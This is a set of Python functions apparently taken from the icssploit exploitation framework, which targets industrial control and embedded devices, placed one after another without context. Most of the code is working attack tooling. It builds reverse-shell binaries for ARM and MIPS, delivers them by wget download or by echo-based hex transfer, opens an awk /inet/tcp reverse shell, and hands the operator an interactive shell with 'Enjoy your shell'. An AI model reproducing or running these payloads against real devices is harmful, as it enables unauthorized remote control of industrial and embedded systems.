def wget(self, binary, location): print_status("Using wget method") # generate binary self.generate_binary(self.lhost, self.lport) # run http server thread = threading.Thread(target=self.http_server, args=(self.lhost, self.lport)) thread.start() # wget binary print_status("Using wget to download binary") cmd = "{} http://{}:{}/{} -O {}/{}".format(binary, self.lhost, self.lport, self.binary_name, location, self.binary_name) self.exploit.execute(cmd) # execute binary sock = self.listen(self.lhost, self.lport) self.execute_binary(location, self.binary_name) # waiting for shell self.shell(sock)
def command_run(self, *args, **kwargs): utils.print_status("Running module...") try: self.current_module.run() except KeyboardInterrupt: utils.print_info() utils.print_error("Operation cancelled by user") except: utils.print_error(traceback.format_exc(sys.exc_info()))
def shell(self, sock): print_status("Waiting for reverse shell...") client, addr = sock.accept() sock.close() print_status("Connection from {}:{}".format(addr[0], addr[1])) print_success("Enjoy your shell") t = telnetlib.Telnet() t.sock = client t.interact()
def awk(self, binary): print_status("Using awk method") # run reverse shell through awk sock = self.listen(self.lhost, self.lport) cmd = binary + " 'BEGIN{s=\"/inet/tcp/0/" + self.lhost + "/" + self.lport + "\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'" self.exploit.execute(cmd) # waiting for shell self.shell(sock)
def command_check(self, *args, **kwargs): try: result = self.current_module.check() except Exception as error: utils.print_error(error) else: if result is True: utils.print_success("Target is vulnerable") elif result is False: utils.print_error("Target is not vulnerable") else: utils.print_status("Target could not be verified")
def generate_binary(self, lhost, lport): print_status("Generating reverse shell binary") self.binary_name = random_text(8) ip = self.convert_ip(lhost) port = self.convert_port(lport) if self.arch == 'arm': self.revshell = self.arm[:0x104] + ip + self.arm[ 0x108:0x10a] + port + self.arm[0x10c:] elif self.arch == 'mipsel': self.revshell = self.mipsel[:0xe4] + port + self.mipsel[ 0xe6:0xf0] + ip[2:] + self.mipsel[ 0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:] elif self.arch == 'mips': self.revshell = self.mips[:0xea] + port + self.mips[ 0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[ 2:] + self.mips[0xf8:] else: print_error("Platform not supported")
def echo(self, binary, location): print_status("Using echo method") # generate binary self.generate_binary(self.lhost, self.lport) path = "{}/{}".format(location, self.binary_name) size = len(self.revshell) num_parts = (size / 30) + 1 # transfer binary through echo command print_status("Using echo method to transfer binary") for i in range(0, num_parts): current = i * 30 print_status("Transferring {}/{} bytes".format( current, len(self.revshell))) block = self.revshell[current:current + 30].encode('hex') block = "\\\\x" + "\\\\x".join( a + b for a, b in zip(block[::2], block[1::2])) cmd = 'echo -ne "{}" >> {}'.format(block, path) self.exploit.execute(cmd) # execute binary sock = self.listen(self.lhost, self.lport) self.execute_binary(location, self.binary_name) # waiting for shell self.shell(sock)
def start(self): """ icssploit main entry point. Starting interpreter loop. """ utils.print_info(self.banner) printer_queue.join() while True: try: command, args = self.parse_line(raw_input(self.prompt)) if not command: continue command_handler = self.get_command_handler(command) command_handler(args) except icssploitException as err: utils.print_error(err) except EOFError: utils.print_info() utils.print_status("icssploit stopped") break except KeyboardInterrupt: utils.print_info() finally: printer_queue.join()
def run_threads(self, threads, target, *args, **kwargs): workers = [] threads_running = threading.Event() threads_running.set() for worker_id in range(int(threads)): worker = threading.Thread( target=target, args=chain((threads_running, ), args), kwargs=kwargs, name='worker-{}'.format(worker_id), ) workers.append(worker) worker.start() start = time.time() try: while worker.isAlive(): worker.join(1) except KeyboardInterrupt: threads_running.clear() for worker in workers: worker.join() print_status('Elapsed time: ', time.time() - start, 'seconds')
def http_server(self, lhost, lport): print_status("Setting up HTTP server") server = HttpServer((lhost, int(lport)), HttpRequestHandler) server.serve_forever(self.revshell) server.server_close()